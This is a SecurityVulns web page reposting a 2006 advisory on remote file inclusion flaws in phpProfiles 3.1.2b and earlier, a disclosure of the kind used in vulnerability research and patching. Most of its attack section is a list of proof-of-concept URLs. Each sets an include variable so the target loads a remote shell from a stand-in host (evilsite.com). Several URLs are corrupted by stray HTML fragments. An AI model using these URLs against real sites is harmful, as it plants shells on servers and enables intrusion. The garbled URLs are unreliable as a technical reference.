Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability

  [SA23388] eyeOS File Upload Vulnerability

  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability

  cwmVote 1.0 File Include Vulnerability

From:nuffsaid <nuffsaid_(at)_newbslove.us>
Date:20 декабря 2006 г.
Subject:phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities

+--------------------------------------------------------------------------------
-----------
+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
+--------------------------------------------------------------------------------
-----------
+ Affected Software .: phpProfiles <= 3.1.2b
+ Download ..........: http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip
+ Description .......: "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+--------------------------------------------------------------------------------
-----------
+ Details:
+ phpProfiles has several scripts which do not initialize variables before using them to
+ include files, assuming register_globals = on, we can initialize any one of the variables
+ in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");
+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>
+ include/account.inc.php,   line(s) 09: include("$incpath/footer.inc.php");
+ include/index.inc.php,     line(s) 05: include("$incpath/adminerr.inc.php");
+ ... see below for a list of files affected.
+
+ Proof Of Concept:
+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/index.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header_admin.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_u.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body_admin.inc.php?menu=="fixed">http://evilsite.com/shell.php
+ http://[target]/[path]/include/body_admin.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/do_reg.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+ http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_v.inc.php?incpath=ass="fixed">http://evilsite.com/shell.php?
+--------------------------------------------------------------------------------
-----------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород